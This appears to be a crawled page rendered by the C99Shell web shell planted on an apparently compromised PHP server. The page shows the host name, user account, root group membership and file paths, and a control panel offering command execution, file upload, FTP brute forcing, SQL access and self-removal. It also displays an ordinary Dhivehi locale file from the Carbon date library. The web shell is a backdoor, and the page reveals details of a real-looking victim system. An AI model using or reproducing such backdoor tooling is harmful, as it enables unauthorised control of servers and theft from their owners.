!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/multirest.picotech.app/public_html/vendor/nesbot/carbon/src/Carbon/Lang/   drwxr-xr-x
Free 28.55 GB of 117.98 GB (24.2%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     dv_MV.php (2.63 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/**
 * This file is part of the Carbon package.
 *
 * (c) Brian Nesbitt <brian@nesbot.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

/*
 * Authors:
 * - Ahmed Ali
 */

$months = [
    
'ޖެނުއަރީ',
    
'ފެބްރުއަރީ',
    
'މާރިޗު',
    
'އޭޕްރީލު',
    
'މޭ',
    
'ޖޫން',
    
'ޖުލައި',
    
'އޯގަސްޓު',
    
'ސެޕްޓެމްބަރު',
    
'އޮކްޓޯބަރު',
    
'ނޮވެމްބަރު',
    
'ޑިސެމްބަރު',
];

$weekdays = [
    
'އާދިއްތަ',
    
'ހޯމަ',
    
'އަންގާރަ',
    
'ބުދަ',
    
'ބުރާސްފަތި',
    
'ހުކުރު',
    
'ހޮނިހިރު',
];

return [
    
'year' => '{0}އަހަރެއް|[1,Inf]:count އަހަރު',
    
'y' => '{0}އަހަރެއް|[1,Inf]:count އަހަރު',
    
'month' => '{0}މައްސަރެއް|[1,Inf]:count މަސް',
    
'm' => '{0}މައްސަރެއް|[1,Inf]:count މަސް',
    
'week' => '{0}ހަފްތާއެއް|[1,Inf]:count ހަފްތާ',
    
'w' => '{0}ހަފްތާއެއް|[1,Inf]:count ހަފްތާ',
    
'day' => '{0}ދުވަސް|[1,Inf]:count ދުވަސް',
    
'd' => '{0}ދުވަސް|[1,Inf]:count ދުވަސް',
    
'hour' => '{0}ގަޑިއިރެއް|[1,Inf]:count ގަޑި',
    
'h' => '{0}ގަޑިއިރެއް|[1,Inf]:count ގަޑި',
    
'minute' => '{0}މިނެޓެއް|[1,Inf]:count މިނެޓް',
    
'min' => '{0}މިނެޓެއް|[1,Inf]:count މިނެޓް',
    
'second' => '{0}ސިކުންތެއް|[1,Inf]:count ސިކުންތު',
    
's' => '{0}ސިކުންތެއް|[1,Inf]:count ސިކުންތު',
    
'ago' => ':time ކުރިން',
    
'from_now' => ':time ފަހުން',
    
'after' => ':time ފަހުން',
    
'before' => ':time ކުރި',
    
'diff_yesterday' => 'އިއްޔެ',
    
'diff_today' => 'މިއަދު',
    
'diff_tomorrow' => 'މާދަމާ',
    
'formats' => [
        
'LT' => 'HH:mm',
        
'LTS' => 'HH:mm:ss',
        
'L' => 'D/M/YYYY',
        
'LL' => 'D MMMM YYYY',
        
'LLL' => 'D MMMM YYYY HH:mm',
        
'LLLL' => 'dddd D MMMM YYYY HH:mm',
    ],
    
'calendar' => [
        
'sameDay' => '[މިއަދު] LT',
        
'nextDay' => '[މާދަމާ] LT',
        
'nextWeek' => 'dddd LT',
        
'lastDay' => '[އިއްޔެ] LT',
        
'lastWeek' => '[ފާއިތުވި] dddd LT',
        
'sameElse' => 'L',
    ],
    
'meridiem' => ['މކ''މފ'],
    
'months' => $months,
    
'months_short' => $months,
    
'weekdays' => $weekdays,
    
'weekdays_short' => $weekdays,
    
'weekdays_min' => ['އާދި''ހޯމަ''އަން''ބުދަ''ބުރާ''ހުކު''ހޮނި'],
    
'list' => [', '' އަދި '],
];

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0047 ]--